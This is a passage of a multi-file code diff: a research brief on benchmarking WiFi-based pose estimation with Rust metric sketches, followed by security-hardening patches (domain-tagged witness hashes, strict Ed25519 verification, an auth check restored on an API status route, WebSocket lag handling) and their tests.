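/// Quantize one value to int8 with round-to-nearest and saturation.
pub fn quantize(x: f32, scale: f32) -> i8 {
    (x / scale).round().clamp(-127.0, 127.0) as i8
}

/// Map an int8 code back to the float domain.
pub fn dequantize(q: i8, scale: f32) -> f32 {
    q as f32 * scale
}

/// Quantize-dequantize round trip: what a QDQ pair does to a tensor's values.
pub fn fake_quant(values: &[f32], scale: f32) -> Vec<f32> {
    values
        .iter()
        .map(|&v| dequantize(quantize(v, scale), scale))
        .collect()
}
```

Because the scale is fixed before inference, in-range values lose at most half a quantization step, while out-of-range values saturate. Quantization-aware training exposes the network to exactly this rounding during training, which is why it is the lever proposed for the half model.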
|
||||
|
||||
### RQ4 — Rigorous, reproducible benchmark methodology
|
||||
|
||||
The repo already demonstrates the right methodology in three places — the ADR should codify it, not invent it:
|
||||
|
||||
- **`benchmarks/wiflow-std/RESULTS.md`** — the gold standard already in-tree: pinned upstream commit, seed-42 file-level split documented, corruption masks committed as ground truth, every forced deviation recorded, mean-pose honesty baseline, MEASURED-vs-CLAIMED grading.
|
||||
- **`benchmarks/edge-latency/RESULTS.md`** — criterion 0.5, explicit host machine, low/median/high brackets, contention caveat, host≠ESP32 separation, steady-state-vs-cold-start distinction.
|
||||
- **Rust micro-bench:** criterion benches already exist in both crates (`wifi-densepose-nn/benches/`, `wifi-densepose-train/benches/`).
|
||||
|
||||
What a credible "beyond-SOTA" claim requires (the bar that survives "prove it"):
|
||||
1. **One locked accuracy definition** — PCK normalization (torso vs absolute vs bbox), keypoint convention (15 vs 17 COCO), and split (random / cross-subject / cross-environment) declared *before* the run. The retracted 92.9% died exactly because PCK normalization was unstated.
|
||||
2. **A mean-pose / constant-output honesty baseline** on every split (already done in measurement (b) — a single-subject near-static set scored 95.9% torso-PCK@20 with a *constant* pose). Any claim must beat this.
|
||||
3. **MEASURED-vs-CLAIMED grading** per number, with the exact command and raw-JSON path committed.
|
||||
4. **Cross-domain, not just in-domain.** In-domain PCK is saturated and uninformative; the defensible claim is on cross-subject/cross-environment, where the frontier is 12–44% PCK@20.
|
||||
|
||||
---
|
||||
|
||||
## 3. Proposed benchmark-suite design
|
||||
|
||||
A two-part suite (`wifi-densepose-train` accuracy harness + `wifi-densepose-nn` latency harness), both committing raw JSON + a graded RESULTS.md.
|
||||
|
||||
### 3.1 Accuracy harness (`wifi-densepose-train`)
|
||||
|
||||
- **Metric module with one canonical PCK** (parameterized: `{torso, bbox, absolute}` normalization × threshold × keypoint-map), so a single function scores WiFlow-STD-repro, MM-Fi/AetherArena, and a GraphPose-Fi re-run identically. Lock the default to **torso-PCK@20 on 17-kp COCO** and *always* also print standard-PCK to expose the gap.
|
||||
- **Fixed datasets/splits:** (i) WiFlow-STD cleaned 360k (their split, for repro parity), (ii) MM-Fi P1 random + cross-subject + cross-environment (to line up against GraphPose-Fi 61.1/44.2/12.9 and the project's 81.63), (iii) ESP32 paired eval set when ≥2k multi-subject windows exist.
|
||||
- **Mandatory honesty baselines** emitted every run: mean-pose, constant-output, and (for cross-domain) source-only.
|
||||
- **Output:** raw JSON + a RESULTS.md table with MEASURED/CLAIMED grades, mirroring `benchmarks/wiflow-std/RESULTS.md`.
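
A minimal sketch of what "one canonical PCK" plus a mean-pose honesty baseline could look like in Rust. Everything here is an assumption for illustration: the names `PckNorm`, `pck`, and `mean_pose`, the 2D `Pose` type, the choice of torso keypoint indices left to the caller, and the reading of PCK@20 as "error within 20% of the reference length" (`alpha = 0.2`). It is not the ADR-155 `pck_canonical` implementation.

```rust
/// How the per-sample reference length is chosen (illustrative names).
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum PckNorm {
    /// Distance between two torso keypoints, given by index.
    Torso { a: usize, b: usize },
    /// Diagonal of the ground-truth bounding box.
    Bbox,
    /// Fixed reference length in the data's coordinate units.
    Absolute(f32),
}

/// One pose: a list of 2D keypoints.
pub type Pose = Vec<[f32; 2]>;

fn dist(p: [f32; 2], q: [f32; 2]) -> f32 {
    ((p[0] - q[0]).powi(2) + (p[1] - q[1]).powi(2)).sqrt()
}

fn reference_length(gt: &Pose, norm: PckNorm) -> f32 {
    match norm {
        PckNorm::Torso { a, b } => dist(gt[a], gt[b]),
        PckNorm::Bbox => {
            let (mut lo, mut hi) = ([f32::INFINITY; 2], [f32::NEG_INFINITY; 2]);
            for k in gt {
                for d in 0..2 {
                    lo[d] = lo[d].min(k[d]);
                    hi[d] = hi[d].max(k[d]);
                }
            }
            dist(lo, hi)
        }
        PckNorm::Absolute(len) => len,
    }
}

/// Fraction of keypoints whose error is <= alpha * reference length.
pub fn pck(pred: &[Pose], gt: &[Pose], norm: PckNorm, alpha: f32) -> f32 {
    let (mut hit, mut total) = (0usize, 0usize);
    for (p, g) in pred.iter().zip(gt) {
        let limit = alpha * reference_length(g, norm);
        for (pk, gk) in p.iter().zip(g) {
            total += 1;
            if dist(*pk, *gk) <= limit {
                hit += 1;
            }
        }
    }
    if total == 0 { 0.0 } else { hit as f32 / total as f32 }
}

/// Constant-output honesty baseline: per-keypoint mean of the training poses.
pub fn mean_pose(train: &[Pose]) -> Pose {
    let n_kp = train.first().map_or(0, |p| p.len());
    let mut mean = vec![[0.0f32; 2]; n_kp];
    for pose in train {
        for (m, k) in mean.iter_mut().zip(pose) {
            m[0] += k[0];
            m[1] += k[1];
        }
    }
    let n = train.len().max(1) as f32;
    for m in &mut mean {
        m[0] /= n;
        m[1] /= n;
    }
    mean
}
```

Scoring the same predictions under `Torso`, `Bbox`, and `Absolute` in one run makes the normalization gap visible instead of implicit, and scoring `mean_pose` repeated for every test window gives the floor any model claim has to clear.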
|
||||
|
||||
### 3.2 Latency/size harness (`wifi-densepose-nn`)
|
||||
|
||||
- **Matrix:** `{torch fp32 (ref), ONNX fp32, ONNX static-QDQ-conv-only int8, candle fp32}` × `{full 2.23M, half 843k, tiny 56k}` × `{batch 1, 64}`, criterion-timed, host declared.
|
||||
- **Report:** disk size, batch-1 + batch-64 ms/window (median + low/high), and PCK@20 on the locked 10k-window subset, so latency and accuracy never get cited apart.
|
||||
- **Caveat block up front:** host ≠ ESP32-S3/WASM3, host ≠ Hailo HEF. No host number is presented as the edge number.
|
||||
- **CI gate:** commit the current medians as regression baselines; fail PRs that regress latency >X% or accuracy >Y pt.
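
The CI gate in the last bullet can be sketched as a pure comparison between a committed baseline and a fresh measurement. The types and names below (`Sample`, `Gate`, `Verdict`, `check`) are hypothetical, and the thresholds stand in for the X and Y that the brief deliberately leaves open; reading criterion's output files is out of scope for this sketch.

```rust
/// One measured configuration: median latency and accuracy on the locked subset.
#[derive(Debug, Clone, Copy)]
pub struct Sample {
    pub median_ms: f64,
    pub pck20: f64,
}

/// Allowed regressions (the brief's X and Y; values are chosen by the project).
#[derive(Debug, Clone, Copy)]
pub struct Gate {
    pub max_latency_regress_pct: f64,
    pub max_accuracy_drop_pt: f64,
}

#[derive(Debug, PartialEq)]
pub enum Verdict {
    Pass,
    LatencyRegressed { pct: f64 },
    AccuracyRegressed { drop_pt: f64 },
}

/// Compare a fresh measurement against the committed baseline.
pub fn check(baseline: Sample, current: Sample, gate: Gate) -> Verdict {
    // Relative latency change in percent; positive means slower.
    let pct = (current.median_ms - baseline.median_ms) / baseline.median_ms * 100.0;
    if pct > gate.max_latency_regress_pct {
        return Verdict::LatencyRegressed { pct };
    }
    // Absolute accuracy change in percentage points; positive means worse.
    let drop_pt = baseline.pck20 - current.pck20;
    if drop_pt > gate.max_accuracy_drop_pt {
        return Verdict::AccuracyRegressed { drop_pt };
    }
    Verdict::Pass
}
```

Keeping latency and accuracy in the same `Sample` mirrors the report rule above: a faster model that silently lost accuracy fails the same gate as a slower one.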
|
||||
|
||||
### 3.3 What counts as a defensible "beyond-SOTA" result
|
||||
|
||||
A claim is citable only if **all** hold: (1) scored under a pre-declared metric/split, (2) beats the relevant published frontier number *on the same metric definition* (e.g. >61.1% standard-PCK@20 on MM-Fi random, or >12.9% on cross-environment), (3) beats the mean-pose honesty baseline, (4) raw JSON + exact command committed, (5) graded MEASURED. The single most valuable "beyond-SOTA" target is **cross-environment MM-Fi**, where the published bar (12.9% PCK@20) is low enough that a real win is both achievable and unambiguous.
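
The five conditions above can be encoded as a checklist so that a RESULTS.md generator refuses to label a number "beyond-SOTA" unless every one holds. This is a sketch with hypothetical names (`Claim`, `unmet`, `is_citable`); the harness would have to supply the frontier and baseline values, scored under the same metric definition.

```rust
/// Evidence attached to one benchmark claim (all field names are illustrative).
#[derive(Debug, Clone)]
pub struct Claim {
    pub metric_and_split_predeclared: bool,
    pub score_pct: f64,
    /// Published frontier number under the SAME metric definition and split.
    pub published_frontier_pct: f64,
    /// Mean-pose honesty baseline on the same split.
    pub mean_pose_baseline_pct: f64,
    pub raw_json_and_command_committed: bool,
    pub graded_measured: bool,
}

impl Claim {
    /// Returns the conditions that are not satisfied, in the brief's numbering.
    pub fn unmet(&self) -> Vec<&'static str> {
        let checks = [
            (self.metric_and_split_predeclared, "(1) pre-declared metric/split"),
            (
                self.score_pct > self.published_frontier_pct,
                "(2) beats published frontier on the same metric",
            ),
            (
                self.score_pct > self.mean_pose_baseline_pct,
                "(3) beats mean-pose baseline",
            ),
            (self.raw_json_and_command_committed, "(4) raw JSON + command committed"),
            (self.graded_measured, "(5) graded MEASURED"),
        ];
        checks
            .iter()
            .filter(|(ok, _)| !*ok)
            .map(|(_, why)| *why)
            .collect()
    }

    /// A claim is citable only if no condition is unmet.
    pub fn is_citable(&self) -> bool {
        self.unmet().is_empty()
    }
}
```

Returning the list of unmet conditions, rather than a bare boolean, lets the report state why a number was downgraded to CLAIMED.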
|
||||
|
||||
---
|
||||
|
||||
## 4. Gap table
|
||||
|
||||
| Capability | Project current (graded) | Published SOTA (graded) | Proposed target | Data / hardware needed |
|---|---|---|---|---|
| In-domain 2D PCK@20 (self-collected) | 96.09–96.61% (MEASURED, RTX 5080, WiFlow-STD repro) | 97.25% claimed (WiFlow-STD, CLAIMED) | match within noise + own architecture | cleaned 360k dataset (have); already met |
| In-domain MM-Fi PCK@20 (torso-norm) | 81.63% torso-PCK (MEASURED-internal) | GraphPose-Fi 61.1% *standard*-PCK (PREPRINT) — **not comparable** | re-score both under **one** PCK def | MM-Fi P1 (have); unified metric harness (gap) |
| **Cross-subject MM-Fi PCK@20** | ~11.6% torso (MEASURED, the cliff) | GraphPose-Fi 44.2% standard (PREPRINT) | close gap via MAE pretrain + graph decoder | 1.3M heterogeneous CSI corpus (ADR-150/152 §2.3), ViT-Small encoder |
| **Cross-environment MM-Fi PCK@20** | untested-internal | GraphPose-Fi 12.9% standard (PREPRINT) | **beat 12.9% → cleanest beyond-SOTA win** | MM-Fi cross-env split + geometry conditioning (ADR-152 §2.1) |
| ESP32 CSI→pose (17-kp) | no run beats mean-pose baseline (MEASURED, measurement b) | n/a (no public ESP32 pose benchmark) | beat mean-pose on temporal split | ≥2k multi-subject/multi-position paired windows (gap) |
| Edge int8 size/accuracy | static QDQ conv-only 96.61% @ 2.53 MB; tiny 94.1% @ 295 KB fp32 (MEASURED) | no model-matched public number | **QAT-int8 on half model** (untested lever) | PyTorch QAT + QDQ export; RTX 5080 (have) |
| Edge CPU latency | ONNX fp32 3.2 ms/win b1 host (MEASURED) | n/a (model-specific) | committed criterion regression baseline | host bench (have); ESP32/Hailo on-hardware (gap) |
| Hailo HEF edge inference | none in-tree (gap) | n/a | first MEASURED HEF latency | Hailo compile toolchain + Pi cluster (have hardware, CLAUDE.local.md) |
| Foundation encoder (MAE) | recipe adopted, untrained (ADR-152 §2.3) | UNSW: log-linear cross-domain scaling on *classification* (PREPRINT) | pose-transfer validation (hypothesis today) | 1.3M-sample corpus aggregation (priority per F3) |
|
||||
|
||||
---
|
||||
|
||||
## 5. Sources (graded)
|
||||
|
||||
| Source | Type | Grade | Used for |
|---|---|---|---|
| GraphPose-Fi, arXiv [2511.19105](https://arxiv.org/abs/2511.19105) | preprint | PREPRINT; table numbers MEASURED-in-study (fetched + quoted) | RQ1 MM-Fi frontier (61.1/44.2/12.9 PCK@20, 160.6/210.5/302.7 mm) |
| WiFlow-STD, arXiv [2602.08661](https://arxiv.org/abs/2602.08661) + [DY2434 repo](https://github.com/DY2434/WiFlow-WiFi-Pose-Estimation-with-Spatio-Temporal-Decoupling) | preprint+code | numbers CLAIMED; artifacts MEASURED; **project repro 96% MEASURED** | RQ1/RQ2/RQ3 |
| PerceptAlign, arXiv [2601.12252](https://arxiv.org/abs/2601.12252) | preprint + MobiCom'26 acceptance | CLAIMED numbers; failure mode corroborated | RQ1/RQ2 geometry conditioning |
| UNSW MAE, arXiv [2511.18792](https://arxiv.org/abs/2511.18792) | preprint | ablations MEASURED-in-study; pose transfer = hypothesis | RQ2 MAE recipe |
| DT-Pose, arXiv [2501.09411](https://arxiv.org/abs/2501.09411), OpenReview [aPnLQ6WfQQ](https://openreview.net/forum?id=aPnLQ6WfQQ), [code](https://github.com/cseeyangchen/DT-Pose) | preprint+code (ICLR'25) | exact MPJPE table NOT verified here — flagged | RQ2 masked-pretrain + topology |
| Person-in-WiFi-3D, [CVPR 2024](https://openaccess.thecvf.com/content/CVPR2024/html/Yan_Person-in-WiFi_3D_End-to-End_Multi-Person_3D_Pose_Estimation_with_Wi-Fi_CVPR_2024_paper.html) | peer-reviewed | MEASURED (91.7/108.1/125.3 mm); own dataset | RQ1 3D multi-person frontier |
| ONNX Runtime quantization [docs](https://onnxruntime.ai/docs/performance/model-optimizations/quantization.html) | vendor docs | VENDOR | RQ3 PTQ/QAT mechanics |
| NVIDIA TensorRT QAT [blog](https://developer.nvidia.com/blog/achieving-fp32-accuracy-for-int8-inference-using-quantization-aware-training-with-tensorrt/), [Ultralytics](https://www.ultralytics.com/glossary/quantization-aware-training-qat) | vendor/blog | BLOG/VENDOR; general, not CSI-specific | RQ3 QAT>PTQ context |
| Onboard Optimization survey, arXiv [2505.08793](https://arxiv.org/pdf/2505.08793) | preprint | PREPRINT | RQ3 on-device optimization landscape |
| In-tree `benchmarks/wiflow-std/RESULTS.md`, `benchmarks/edge-latency/RESULTS.md`, ADR-150, ADR-152, ADR-015 | internal MEASURED | MEASURED-internal | grounding, all RQs |
|
||||
|
||||
**Unverified / flagged:** DT-Pose exact MM-Fi MPJPE table not extracted at primary-source precision (abstract-level only). GraphPose-Fi parameter count not reported in the paper. WiFlow-STD/PerceptAlign accuracy numbers are author-self-reported preprints. No CSI-pose-specific QAT benchmark exists in the public literature — the QAT recommendation rests on general (non-CSI) vendor/blog evidence.
|
||||
@@ -102,19 +102,43 @@ pub struct WitnessEvent {
|
||||
pub this_hash: WitnessHash,
|
||||
}
|
||||
|
||||
/// Domain-separation tag prefixing every witness canonical message.
|
||||
///
|
||||
/// This is the *domain tag* half of the "domain-tag + length-prefix"
|
||||
/// rule for any hashed/signed message whose fields are
|
||||
/// operator-influenceable. The witness chain already length-prefixes
|
||||
/// `kind` and `payload` (preventing intra-protocol concatenation
|
||||
/// forgery); the tag adds cross-protocol separation so a SHA-256
|
||||
/// preimage / Ed25519 message produced here can never be re-interpreted
|
||||
/// as a message from another signing context that shares key
|
||||
/// infrastructure — notably ADR-116's *manifest* `binary_signature`
|
||||
/// (Ed25519 over `binary_sha256`), which ADR-262 P2 reuses this exact
|
||||
/// chain for. A signature is only ever valid for the one domain whose
|
||||
/// tag it commits to.
|
||||
///
|
||||
/// The trailing NUL terminates the version string so a future
|
||||
/// migration (Blake3, extra fields, Merkle tier) bumps the tag instead
|
||||
/// of silently colliding with v1 bundles.
|
||||
pub const WITNESS_DOMAIN_TAG: &[u8] = b"cog-ha-matter/witness-event/v1\x00";
|
||||
|
||||
/// Compute the canonical-bytes form an event is hashed over.
|
||||
///
|
||||
/// The format is intentionally simple and length-prefixed so a
|
||||
/// future migration can be staged with a `version` byte in front
|
||||
/// without ambiguity:
|
||||
/// The format is domain-tagged and length-prefixed:
|
||||
///
|
||||
/// ```text
|
||||
/// prev_hash[32] | seq:u64-be | ts:u64-be | kind_len:u32-be | kind | payload_len:u32-be | payload
|
||||
/// DOMAIN_TAG | prev_hash[32] | seq:u64-be | ts:u64-be
|
||||
/// | kind_len:u32-be | kind | payload_len:u32-be | payload
|
||||
/// ```
|
||||
///
|
||||
/// Length-prefixing prevents the classic "concatenation forgery"
|
||||
/// attack where `"abc" + "def"` and `"ab" + "cdef"` would hash the
|
||||
/// same.
|
||||
/// * The leading [`WITNESS_DOMAIN_TAG`] gives cross-protocol
|
||||
/// separation: bytes signed/hashed here cannot be replayed as a
|
||||
/// message for another Ed25519 context in the same trust chain
|
||||
/// (e.g. the manifest `binary_signature`). It also carries a format
|
||||
/// version for staged migrations.
|
||||
/// * Length-prefixing `kind` and `payload` prevents the classic
|
||||
/// "concatenation forgery" where `"abc" + "def"` and `"ab" + "cdef"`
|
||||
/// would hash the same. The fixed-width `prev_hash`/`seq`/`ts`
|
||||
/// fields are self-delimiting.
|
||||
pub fn canonical_bytes(
|
||||
prev_hash: WitnessHash,
|
||||
seq: u64,
|
||||
@@ -123,7 +147,10 @@ pub fn canonical_bytes(
|
||||
payload: &[u8],
|
||||
) -> Vec<u8> {
|
||||
let kind_bytes = kind.as_bytes();
|
||||
let mut out = Vec::with_capacity(32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len());
|
||||
let mut out = Vec::with_capacity(
|
||||
WITNESS_DOMAIN_TAG.len() + 32 + 8 + 8 + 4 + kind_bytes.len() + 4 + payload.len(),
|
||||
);
|
||||
out.extend_from_slice(WITNESS_DOMAIN_TAG);
|
||||
out.extend_from_slice(&prev_hash.0);
|
||||
out.extend_from_slice(&seq.to_be_bytes());
|
||||
out.extend_from_slice(&timestamp_unix_s.to_be_bytes());
|
||||
@@ -466,11 +493,51 @@ mod tests {
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canonical_bytes_starts_with_prev_hash() {
|
||||
fn canonical_bytes_starts_with_domain_tag_then_prev_hash() {
|
||||
// Locks the on-wire format. A future migration that flips
|
||||
// field order must bump a version byte and update this test.
|
||||
// field order must bump the domain tag and update this test.
|
||||
let bytes = canonical_bytes(WitnessHash([7u8; 32]), 1, 2, "k", b"p");
|
||||
assert_eq!(&bytes[..32], &[7u8; 32]);
|
||||
let tag = WITNESS_DOMAIN_TAG.len();
|
||||
assert_eq!(&bytes[..tag], WITNESS_DOMAIN_TAG);
|
||||
assert_eq!(&bytes[tag..tag + 32], &[7u8; 32]);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn canonical_bytes_is_domain_separated() {
|
||||
// Cross-protocol separation: the witness preimage must begin
|
||||
// with the domain tag so its SHA-256 / Ed25519 message can
|
||||
// never be reinterpreted as a message from another signing
|
||||
// context that shares key infrastructure (e.g. the manifest
|
||||
// `binary_signature` over `binary_sha256`). Fails on the old
|
||||
// un-tagged encoding, which began directly with `prev_hash`.
|
||||
let bytes = canonical_bytes(WitnessHash::GENESIS, 0, 0, "k", b"p");
|
||||
assert!(
|
||||
bytes.starts_with(WITNESS_DOMAIN_TAG),
|
||||
"canonical message is not domain-separated"
|
||||
);
|
||||
// The tag is versioned and NUL-terminated.
|
||||
assert!(WITNESS_DOMAIN_TAG.ends_with(b"\x00"));
|
||||
assert!(WITNESS_DOMAIN_TAG.windows(2).any(|w| w == b"v1"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn witness_preimage_cannot_collide_with_a_bare_manifest_digest() {
|
||||
// The manifest `binary_signature` signs a bare 64-byte
|
||||
// SHA-256 hex string. A witness preimage must never *equal*
|
||||
// such a string, even if an operator crafted kind/payload to
|
||||
// try; the domain tag (31 bytes) + fixed 48-byte prefix make
|
||||
// the witness message structurally longer and tag-distinct.
|
||||
// Fails on the old encoding only if it could ever produce a
|
||||
// 64-byte all-hex message; the tag makes the impossibility
|
||||
// explicit and regression-guarded.
|
||||
let manifest_digest_msg = "a".repeat(64); // 64 ASCII hex bytes
|
||||
let witness = canonical_bytes(WitnessHash::GENESIS, 0, 0, "", b"");
|
||||
assert_ne!(witness.as_slice(), manifest_digest_msg.as_bytes());
|
||||
assert!(
|
||||
witness.len() > manifest_digest_msg.len(),
|
||||
"domain tag must make witness preimage structurally distinct"
|
||||
);
|
||||
assert!(!witness.starts_with(b"aaaa"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
|
||||
@@ -36,7 +36,7 @@
|
||||
//! key store (separate concern). Tests use a fixed-bytes seed for
|
||||
//! determinism — never check in real Seed keys here.
|
||||
|
||||
use ed25519_dalek::{Signature, Signer, SigningKey, Verifier, VerifyingKey};
|
||||
use ed25519_dalek::{Signature, Signer, SigningKey, VerifyingKey};
|
||||
|
||||
use crate::witness::{canonical_bytes, WitnessEvent};
|
||||
|
||||
@@ -58,6 +58,16 @@ pub fn sign_event(event: &WitnessEvent, key: &SigningKey) -> Signature {
|
||||
/// Verify an Ed25519 signature against a witness event using the
|
||||
/// Seed's public key. `Ok(())` iff the signature is valid for the
|
||||
/// event's canonical bytes under this key.
|
||||
///
|
||||
/// Uses `verify_strict` (not the permissive `Verifier::verify`) on
|
||||
/// purpose: for a tamper-evident *audit* chain the signature is the
|
||||
/// attestation, so non-canonical encodings and small-order public
|
||||
/// keys must be rejected. `verify_strict` enforces RFC 8032's
|
||||
/// stricter checks, giving the "one canonical signature per event"
|
||||
/// property an auditor relies on when comparing or deduplicating
|
||||
/// signed witness records. The public key is caller-pinned (the
|
||||
/// Seed's known verifying key) — never parsed from the event — so a
|
||||
/// forged event carrying its own key cannot self-verify.
|
||||
pub fn verify_signature(
|
||||
event: &WitnessEvent,
|
||||
signature: &Signature,
|
||||
@@ -71,7 +81,7 @@ pub fn verify_signature(
|
||||
&event.payload,
|
||||
);
|
||||
public_key
|
||||
.verify(&bytes, signature)
|
||||
.verify_strict(&bytes, signature)
|
||||
.map_err(|_| SignatureVerifyError::Invalid)
|
||||
}
|
||||
|
||||
@@ -140,6 +150,58 @@ mod tests {
|
||||
verify_signature(&event, &sig, &public).expect("clean signature verifies");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn signature_commits_to_domain_tag_not_bare_fields() {
|
||||
// The signature is over the domain-tagged canonical bytes. A
|
||||
// signature produced over the *un-tagged* concatenation of the
|
||||
// same fields must NOT verify — proving cross-protocol
|
||||
// separation reaches the signature layer, not just the hash.
|
||||
// Fails on the old encoding where the signed message began
|
||||
// directly with `prev_hash` (no tag).
|
||||
use ed25519_dalek::Signer;
|
||||
let key = fixed_key();
|
||||
let public = key.verifying_key();
|
||||
let event = fresh_event();
|
||||
|
||||
// Hand-build the OLD (un-tagged) preimage and sign it.
|
||||
let mut untagged = Vec::new();
|
||||
untagged.extend_from_slice(&event.prev_hash.0);
|
||||
untagged.extend_from_slice(&event.seq.to_be_bytes());
|
||||
untagged.extend_from_slice(&event.timestamp_unix_s.to_be_bytes());
|
||||
untagged.extend_from_slice(&(event.kind.len() as u32).to_be_bytes());
|
||||
untagged.extend_from_slice(event.kind.as_bytes());
|
||||
untagged.extend_from_slice(&(event.payload.len() as u32).to_be_bytes());
|
||||
untagged.extend_from_slice(&event.payload);
|
||||
let old_sig = key.sign(&untagged);
|
||||
|
||||
// The current verifier (which uses the domain-tagged message)
|
||||
// must reject a signature made over the un-tagged bytes.
|
||||
let err = verify_signature(&event, &old_sig, &public).unwrap_err();
|
||||
assert_eq!(err, SignatureVerifyError::Invalid);
|
||||
|
||||
// Sanity: the proper signature still verifies.
|
||||
let good = sign_event(&event, &key);
|
||||
verify_signature(&event, &good, &public).expect("tagged signature verifies");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn verify_uses_strict_path_and_pins_caller_key() {
|
||||
// Regression guard: verification must run through the strict
|
||||
// path against a CALLER-supplied key. A wrong key fails; the
|
||||
// event never carries its own verifying key, so a forged event
|
||||
// cannot self-attest. (verify_strict additionally rejects
|
||||
// non-canonical / small-order encodings.)
|
||||
let key = fixed_key();
|
||||
let wrong = SigningKey::from_bytes(b"another-wrong-key-another-wrong-");
|
||||
let event = fresh_event();
|
||||
let sig = sign_event(&event, &key);
|
||||
verify_signature(&event, &sig, &key.verifying_key()).expect("right key verifies");
|
||||
assert_eq!(
|
||||
verify_signature(&event, &sig, &wrong.verifying_key()).unwrap_err(),
|
||||
SignatureVerifyError::Invalid
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn verify_rejects_signature_under_wrong_key() {
|
||||
let key = fixed_key();
|
||||
|
||||
@@ -12,8 +12,20 @@ use crate::state::SharedState;
 #[derive(Serialize)]
 pub struct ApiRunning { message: &'static str }

-pub async fn api_root() -> Json<ApiRunning> {
-    Json(ApiRunning { message: "API running." })
+/// `GET /api/` — the HA `APIStatusView` ("API running." ping).
+///
+/// Security (HC-API-AUTH-01): HA's `APIStatusView` inherits
+/// `requires_auth = True` from `HomeAssistantView`, so an unauthenticated
+/// (or wrong-token) request to `/api/` returns **401**, not 200. HA
+/// clients (and the companion app) rely on this status route as a
+/// *token-validation probe* — a 200 here would tell a client a bad token
+/// is good, and would let an unauthenticated party confirm a live
+/// HOMECORE-API endpoint. The P2 handler skipped the bearer gate that
+/// every sibling route applies; this restores wire-compat by validating
+/// the bearer like `get_config`/`get_states` before replying.
+pub async fn api_root(headers: HeaderMap, State(s): State<SharedState>) -> ApiResult<Json<ApiRunning>> {
+    let _ = BearerAuth::from_headers(&headers, s.tokens()).await?;
+    Ok(Json(ApiRunning { message: "API running." }))
 }

 #[derive(Serialize)]
|
||||
@@ -298,7 +298,17 @@ impl Connection {
                             }
                         }
                         Ok(_) => {}
-                        Err(_) => break,
+                        // A slow consumer that falls >4,096 events behind
+                        // gets `Lagged(n)`, which is RECOVERABLE: the bus
+                        // doc (`bus.rs` §"Lagged receivers must re-sync")
+                        // and HA's WS contract both keep the subscription
+                        // alive across a lag. The pre-fix `Err(_) => break`
+                        // treated `Lagged` as fatal, silently killing the
+                        // client's event stream on a burst (HC-WS-LAG-01).
+                        // Skip the dropped window and continue; only a
+                        // `Closed` sender ends the task.
+                        Err(broadcast::error::RecvError::Lagged(_)) => continue,
+                        Err(broadcast::error::RecvError::Closed) => break,
                     },
                     evt = domain_rx.recv() => match evt {
                         Ok(de) => {
@@ -316,7 +326,12 @@ impl Connection {
                                 if tx_clone.send(payload.to_string()).is_err() { break; }
                             }
                         }
-                        Err(_) => break,
+                        // Same recoverable-lag handling as the system arm
+                        // above (HC-WS-LAG-01): a lagged domain-event
+                        // receiver re-syncs and continues; only `Closed`
+                        // terminates the subscription.
+                        Err(broadcast::error::RecvError::Lagged(_)) => continue,
+                        Err(broadcast::error::RecvError::Closed) => break,
                     }
                 }
             }
|
||||
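The `Lagged`/`Closed` distinction in the WebSocket hunks above can be illustrated without tokio. The sketch below is a std-only stand-in, not the project's code: the local `RecvError` enum only mirrors the shape of `tokio::sync::broadcast::error::RecvError`, and `drain` is a hypothetical helper that walks a scripted sequence of receive results the way the fixed event task treats them (deliver `Ok`, skip past `Lagged`, stop on `Closed`).

```rust
// Hypothetical local stand-in for `tokio::sync::broadcast::error::RecvError`,
// declared here only so the sketch compiles with the standard library alone.
#[derive(Debug, Clone, PartialEq)]
enum RecvError {
    Lagged(u64),
    Closed,
}

/// Walks a scripted list of receive results. Returns the delivered events and
/// the total number of events reported as skipped by `Lagged`.
fn drain(results: Vec<Result<&'static str, RecvError>>) -> (Vec<&'static str>, u64) {
    let mut delivered = Vec::new();
    let mut skipped = 0u64;
    for r in results {
        match r {
            Ok(evt) => delivered.push(evt),
            // Recoverable: note the gap and keep the subscription alive.
            Err(RecvError::Lagged(n)) => {
                skipped += n;
                continue;
            }
            // Terminal: the sender is gone, so the task ends.
            Err(RecvError::Closed) => break,
        }
    }
    (delivered, skipped)
}

fn main() {
    let script = vec![
        Ok("first"),
        Err(RecvError::Lagged(1904)),
        Ok("lag_probe"),
        Err(RecvError::Closed),
        Ok("after close"),
    ];
    let (delivered, skipped) = drain(script);
    println!("delivered={delivered:?} skipped={skipped}");
}
```

With a catch-all `Err(_) => break` in place of the two error arms, the same script would stop at the `Lagged` entry and `lag_probe` would never be delivered, which is the failure mode HC-WS-LAG-01 describes.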
@@ -75,3 +75,72 @@ async fn from_env_path_enforces_whitelist() {
|
||||
assert!(!store.is_valid("not_in_whitelist").await);
|
||||
assert!(!store.is_dev_mode().await, "from_env must NOT be dev mode");
|
||||
}
|
||||
|
||||
// ─── HC-API-AUTH-01: `GET /api/` must be auth-gated like every sibling ───
|
||||
//
|
||||
// HA's `APIStatusView` inherits `requires_auth = True`, so `/api/` returns
|
||||
// 401 for a missing/wrong bearer and 200 only for a valid one. The pre-fix
|
||||
// `api_root` took no headers and unconditionally returned 200 — these two
|
||||
// tests FAIL on that code.
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_rejects_missing_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::UNAUTHORIZED,
|
||||
"GET /api/ with NO bearer must be 401 (HC-API-AUTH-01) — HA's \
|
||||
APIStatusView requires_auth=True; a 200 here lets an \
|
||||
unauthenticated party confirm a live endpoint and tells a \
|
||||
token-validation probe a bad token is good"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_rejects_wrong_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.header("Authorization", "Bearer the_wrong_token")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
